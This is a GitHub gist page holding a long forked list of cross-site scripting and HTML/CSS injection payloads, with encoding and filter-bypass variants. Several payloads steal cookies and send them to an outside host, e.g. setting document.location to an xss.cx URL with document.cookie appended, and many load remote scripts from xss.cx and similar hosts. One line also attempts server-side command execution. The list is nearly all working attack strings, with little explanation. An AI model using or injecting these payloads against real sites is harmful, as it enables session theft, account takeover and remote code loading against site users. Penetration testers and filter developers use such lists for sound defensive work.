Forked from xsscx/XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
Created
March 22, 2018 02:33
-
-
Save idkwim/accb5ae3abe2f9dd3a944f9eda0b7dd7 to your computer and use it in GitHub Desktop.
Revisions
-
xsscx renamed this gist
Jan 31, 2015 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Jan 31, 2015 . No changes.There are no files selected for viewing
-
Jan 31, 2015 . 1 changed file with 20 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1180,5 +1180,24 @@ top[630038579..toString(30)](1) Object.prototype[Symbol.toStringTag]='<svg/onload=alert(1)>'; while(1){} location='javascript:1+{}' width:expression(if(!window.done)alert(1),window.done=1) expression(window.x?0:(confirm(7),window.x=1)) background-image:url(https://s1.yimg.com/rz/l/yahoo_en-US_b_w_26x14_2x.png) behaviour:url\0028javascript:confirm\0028[0][0]\0029\0029 /*@cc_on @if(1)confirm(1)@end }*{color:#ccc;} "; ||confirm('XSS') || " <// style=x:expression\28write(1)\29> <STYLE TYPE="text/javascript">confirm(document.location);</STYLE> <STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A> <STYLE>@import'http://xss.cx/xss.css';</STYLE> <XSS STYLE="xss:expression(confirm(document.location))"> <meta charset=iso-2022-jp>%1B(B%1B><svg onload=alert(1)>%1B$B%1B %20~}%22%3Cmeta%20charset=hz-gb-2312%3E%3Csvg%20onload%3Dalert%281%29%3E~{ %3Cmeta%20charset=iso-2022-jp%3E%1B(J+onfocus=alert(1)%20autofocus%3E%1B$(D%1B( %3Cmeta+charset%3Dhz-gb-2312%3E%27~%7B%27%3C~%7D%22%20onmouseover=alert%281%29%20a= %3Cmeta%20charset=hz-gb-2312%3E~{!~}%22%20onfocus=alert%281%29%20autofocus%3E %1B%28J%3Cmeta%20charset%3Diso-2022-jp%3E%3Cbody%20onload=alert%281%29%3E%1B%24%40%1B /* RFI STOP */ -
Jan 31, 2015 . 1 changed file with 212 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -969,4 +969,216 @@ data:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/. <script>[{get[alert(1)]()false}]</script> <script>a = {get[alert`1`](){}}</script> <svg><a xyz:href=123><text>test</text></svg> '() {' document.createElement('img').src='javascript:while(1){}' '<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>' (function(a){alert(1)}).call() {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} p'rompt(1) "(prompt(1))in" parseInt("prompt",36); eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41))) eval(1558153217..toString(36))(1) eval(630038579..toString(30))(1) eval(0x258da033.toString(30))(1) for((i)in(self))eval(i)(1) {"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}} //prompt.ml%2f@ᄒ.ws/✌ //prompt.ml%2f@⒕₨ javascript:prompt(1)#{"action":1} vbscript:prompt(1)#{"action":1} window.location.assign("http://xss.cx") window.name='a\x01b' window.name='hacked';location.replace('about:blank'); window.name="javascript:confirm((window.opener||window).document.cookie);"; window.open("http://xss.cx","confirm(document.domain);", "", false); vbscr	ipt:confirm(1)" vbscript:confirm(1); vbscript:confirm(1); {{{}.toString.constructor('confirm(1)')()}} try{confirm(document.domain)}catch(e){location.reload()} \u003C \u003E \u003c \u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e \u003e \u0061lert(1) \u0061\u006c\u0065\u0072\u0074 \u0061\u006c\u0065\u0072\u0074(1) %ufflcxss%2f%uffle this["ownerDocu"+"ment"]["loca"+"tion"]=”//google.com” throw delete~typeof~confirm(1)/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== data:text/html,<script>confirm(0);confirm(1);location.reload();</script> .__defineGetter__.constructor('[].constructor. defineSetter('x',confirm); x=1; delete [a=confirm],delete a(1) delete confirm(1) delete~[a=confirm]/delete a(1) var a=0; ((a == 1) ? 2 : confirm(1));// null%22%20style%3d%22background%3aexpression%28confirm%282727%29 ";document.body.addEventListener("DOMActivate",confirm(1))// delete~[a=confirm]/delete a(1) (0)['constructor']['constructor']("\141\154\145\162\164(1)")(); javascript:confirm&lpar1&rpar " onfocus="write(unescape('<')+'script src='+unescape('"http://') ' onmouseover=confirm(document.location) (0)['constructor']['constructor']("\141\154\145\162\164(1)")(); {1+1,confirm(8)} <blink/ onmouseover=prompt(1)>OnMouseOver ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ 12345 /\51')() 1/confirm(1) "1\"&confirm(1)\"3" >%22%27><img%20src%3d%22javascript:confirm(%27%20XSS%27)%22>'%uff1cscript%uff1econfirm('XSS')%uff1c/script%uff1e'">>"'';!--"<XSS>=&{()} \%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}// '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E \%22;confirm(1);// \%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)// Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm ExternalInterface.call("document.write","<script>confirm(1)</script>"); ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100'); myWindow.document.write(\"<html><head><script src=\'http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()"); JaVaScRipT:confirm(1) String.fromCharCode(0xffff+0x3d) (String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41)) [U+2028]confirm(1) '-/"/-confirm(1)//' +confirm(1) +confirm(1)-- -confirm(1)- \";confirm(1);// “;confirm(1)// confirm(1)".replace(/.+/,eval)// confirm(1)>>>/xss '+confirm(9)&&null==' ';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//"; confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//-- ';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--</SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT> ';confirm(String.fromCharCode(88,83,83))//\';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//\";confirm(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{} \";confirm(document.location);// confirm(document.location) confirm(document.selection.createRange().getBookmark()) confirm(location.hostname) confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>')); confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click')); confirm(window.toStaticHTML('<marquee>foo</marquee>')); confirm(<xss>xs{[function::status]}s</xss>) %c0″//(0000%0dconfirm(1)// ;\"))}catch(e) {confirm(document.location);}// ;\\"))}catch(e) {confirm(document.location);}// \"));}catch(e){confirm(document.domain);}// \"));}catch(e){confirm(document.domain)}// \"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}// ";document.body.addEventListener("DOMActivate",confirm(1))// document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=confirm(1)>') "+document.cookie+" document.cookie='xss=xss;domain=.cx.' document.getElementsByName("login").item(0).src = http://xss.cx/ document.location="http://xss.cx/default.aspx?c=" + document.cookie '},document.location=window.name+'//'+ document.location=window.name+'//'+ document.location=window.name%2b%27//%27%2b document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase() document.write('<img src="<iframe/onload=confirm(1)>\0">') ";escape=eval;// eval(location.hash.slice(1)) eval(location.hash.slice(1))// ");eval(name+" "+eval(name)+" eval(name) eval('\\u'+'0061'+'lert(1)') getURL("javascript:confirm(document.location)") header('Refresh: 0;url=javascript:confirm(1)'); htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; if(1)confirm(1)}{ javaSCRIPT:confirm(1) javas	cript:\u0061lert(1); javascript:confirm(1) javascript:confirm(1) "javascript:confirm(0);", ;javascript:confirm(0); ;})javascript:confirm(0); javascript:confirm(0); javascript:confirm(1)// javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x "javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x" /"/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x javascript:\u0061lert(1) javascript:confirm(document.cookie) location='vbscript:alert(1)' (location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src="x:x" onerror="if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}"> ';location='javascript://'%2Blocation.hash;' location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)' location='javascript:%61%6c%65%72%74%28%31%29' location=javascript:confirm(0);. ";location=name;// \nconfirm(1) navigateToURL(new URLRequest("Javascript: document.write(\"<script>confirm(1)</scr\"+\"ipt>\")"),"_self") new XMLHttpRequest().open("GET", "data:text/html,<svg onload=confirm(2)></svg>", false); ;onerror=confirm;throw 1; onerror=confirm;throw 1; onerror=confirm;throw 1; onerror=eval;throw'=confirm\x281\x29'; onerror=eval;throw'=confirm\x281\x29'; "onload="a=document.createElement('script');a.setAttribute('src',String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a) onload=confirm(1)// prompt(0x0064) ;prompt(1)//”;prompt(2)//”;prompt(3)//–></SCRIPT>”>’><SCRIPT>prompt(4)</SCRIPT> "!=prompt(9)!=" "*prompt(9)*" "-prompt(9)-" "/prompt(9)/" "<<prompt(9)<<" "<=prompt(9)<=" "<prompt(9)<" "===prompt(9)===" "==prompt(9)==" ">=prompt(9)>=" ">>>prompt(9)>>>" ">>prompt(9)>>" ">prompt(9)>" "?prompt(9):" "^prompt(9)^" "|prompt(9)|" "||prompt(9)||" prompt(9) prompt(location.hash) prototype.join=function(){confirm("PWND:"+document.body.innerHTML)}')(); j
a
vas
cript:confirm(1); parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" prompt(1)-eval(JSON.parse(name).input) javascript:HTMLDocument.__proto__.__defineSetter__("prototype",function(){try{d.d.d}catch(e){confirm(e.stack)}}) confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````; '"()=<z> '"(){}[]; JaVAscRIPT:confirm(4) [XSS](javascript:confirm(6)) (javascript:window.onerror=confirm;throw%20document.cookie) 0\%22))}catch(e){confirm(2)}// Components.lookupMethod(self, 'confirm')(1) Data URl "; ||confirm('XSS') || " '';!--"<XSS>=&{()} '';!--"<XSS>=&{()} 5.replace(/XSS/g,confirm) ";a.b=c;// ";a[b]=c;// a="get"; $("button").val("<iframe src=vbscript:confirm(1)>") external.NavigateAndFind('http://xss.cx',[],[]) javascript	:alert(1) javascript<TAB>:alert(1) {{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}} ${@print(system(“dir”))} {{m=[({}).constructor.defineProperties];[[''.toString.constructor,{'constructor':{} }].reduce(m[0])];''.toString.constructor('alert(1)')()}} Function.prototype.toString=Function.prototype.call;"alert(1)//".replace("//",Function) top[630038579..toString(30)](1) */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())'%3E%3C%%20style='x:expression/* \u{61}l\u{65}rt`1` Object.prototype[Symbol.toStringTag]='<svg/onload=alert(1)>'; while(1){} location='javascript:1+{}' /* RFI STOP */ -
Jan 31, 2015 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,972 @@ /* Remote File Include with HTML TAGS via XSS.Cx */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ /* Updated September 29, 2014 */ /* RFI START */ <img language=vbs src=<b onerror=alert#1/1#> <isindex action="javas	cript:alert(1)" type=image> "]<img src=1 onerror=alert(1)> <input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span> <svg[U+000B]onload=alert(1)> <iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}"> <cite><a href="javascript:confirm(1);">XSS cited!</a></cite> <svg/onload=window.onerror=alert;throw/XSS/;// <video src="x" onloadstart="alert(1)"> <a href="javascript:data:alert(1)">click</a> <a href="javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)">click</a> <div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div> <%%%> <meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J <!-- Hello -- world > <SCRIPT>confirm(1)</SCRIPT> --> <! XSS="><img src=xx:x onerror=confirm(1)//"> "; ||confirm('XSS') || " <? echo('<SCR)'; "/> <img src='aaa' onerror=confirm(document.domain)> /> <img src='aaa' onerror=confirm(document.domain)> <!-- --!><input value="--><body/onload=`confirm(4)//`"> <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a> //|\\ <script //|\\ src='http://xss.cx/xss.js'> //|\\ </script //|\\ < < > > < < > > < < > > < < > > �</form><input type="date" onfocus="confirm(1)"> < < > > %2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E %253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E %253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E %253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E "%25prompt(9)%25" "%26%26prompt(9)%26%26" %26lt%3bscript> "%26prompt(9)%26" %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E <3 </3 "><h1/onmouseover='\u0061lert(1)'>%00 "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' %3C %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E %3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E %3E [4076*A]<img src="x" alt="[0x8F]" test=" onerror=confirm(1)//"> < < > > <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> <A """><IMG SRC="javascript:confirm(1)"> "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF <A/HREF="javascript:confirm(1)"> <B <SCRIPT>confirm(1)</SCRIPT>> <BASE HREF="javascript:confirm('XSS');//"> <BGSOUND SRC="javascript:confirm('XSS');"> <BODY BACKGROUND="javascript:confirm('XSS')"> <BODY ONLOAD=confirm('XSS')> <BR SIZE="&{confirm('XSS')}"> <B="<SCRIPT>confirm(1)</SCRIPT>"> <DIV STYLE="background-image: url(javascript:confirm(5))"> <DIV STYLE="background-image: url(javascript:confirm(5))"> <DIV STYLE="width: expression(confirm(5));"> %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80 <FRAMESET><FRAME RC=""+"javascript:confirm(5);"></FRAMESET> <FRAMESET><FRAME SRC="javascript:confirm(5);"></FRAMESET> > > <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4- <HTML><BODY> <IFRAME SRC="javascript:confirm(5);"></IFRAME> <IFRAME%20src='javascript:confirm%26%23x25;281)'> <![><IMG ALT="]><SCRIPT>confirm(1)</SCRIPT>"> <IMG ALT="><SCRIPT>confirm(1)</SCRIPT>"(EOF) <IMG DYNSRC="javascript:confirm(document.location)"> <IMG LOWSRC="javascript:confirm(document.location)"> <IMG SRC="  javascript:confirm(document.location);"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:confirm(document.location)> <IMG SRC=JaVaScRiPt:confirm("XSS<WBR>")> <IMG SRC=JaVaScRiPt:prompt(document.location)> <IMG SRC="jav ascript:confirm(document.location);"> <IMG SRC=java%00script:confirm(document.location)> <IMG SRC=`javascript:confirm(1)`> <IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))> <IMG SRC=`javascript:confirm(document.cookie)`> <IMG SRC="javascript:confirm(document.location)" <IMG SRC="javascript:confirm(document.location);"> <IMG SRC=javascript:confirm(document.location)> <IMG SRC=javascript:confirm("XSS")> <IMG SRC=javascript:prompt(document.location)> <IMG SRC="jav	ascript:confirm(<WBR>document.location);"> <IMG SRC="jav	ascript:confirm(document.location);"> <IMG SRC="jav
ascript:confirm(<WBR>document.location);"> <IMG SRC="jav
ascript:confirm(document.location);"> <IMG SRC="jav
ascript:confirm(<WBR>document.location);"> <IMG SRC="jav
ascript:confirm(document.location);"> <IMG SRC="livescript:[code]"> <IMG SRC="mocha:[code]"> <IMG SRC='vbscript:msgbox(document.location)'> <IMG SRC=javascript:alert('XSS')> <IMG STYLE="xss:expr/*XSS*/ession(confirm(document.location))"> <IMG onmouseover =confirm(1)> <IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a> <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')> <IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')> <INPUT TYPE="IMAGE" SRC="javascript:confirm(document.location);"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="http://xss.cx/xss.css"> <LINK REL="stylesheet" HREF="javascript:confirm(document.location);"> < < <META HTTP-EQUIV="Link" Content="<http://xss.cx/xss.css>; REL=stylesheet"> <META HTTP-EQUIV="Link" Content="<javascript:confirm(document.location)>; REL=stylesheet"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>confirm(document.location)</SCRIPT>"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:confirm(document.location);"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:confirm(document.location);"> <OBJECT TYPE="text/x-scriptlet" DATA="http://xss.cx/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT> PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+ <S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT> <SCR%00IPT>confirm(document.location)</SCR%00IPT> <SCRIPT SRC="http://xss.cx/xss.jpg"></SCRIPT> <SCRIPT SRC=http://xss.cx/xss.js?<B> <SCRIPT SRC=http://xss.cx/xss.js></SCRIPT> <SCRIPT a=">" '' SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT a=">" SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># </SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT/XSS SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT>a=document.cookie <SCRIPT>confirm(document.location);</SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.cx/xss.js"></SCRIPT> SRC=
<IMG 6;avascript:alert('XSS')> <STYLE TYPE="text/javascript">confirm(document.location);</STYLE> <STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A> <STYLE>@import'http://xss.cx/xss.css';</STYLE> "><STYLE>@import"javascript:confirm(document.location)";</STYLE> <STYLE>@im\port'\ja\vasc\ript:confirm(document.location)';</STYLE> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <TABLE BACKGROUND="javascript:confirm(document.location)"> < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <a data-remote=true data-method=delete href=/delete_account>CLICK</a> <a href=````> <a href="#" onclick="confirm(' ');alert(2 ')">name</a> <a href='#' onmouseover ="javascript:$('a').html(5)">a link</a> <a href="// ͥ.ws">CLICK <a href=[0x0b]" onclick=confirm(1)//">click</a> <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a> <a href=``calc``> <a href="data:application/x-x509-user-cert;
base64
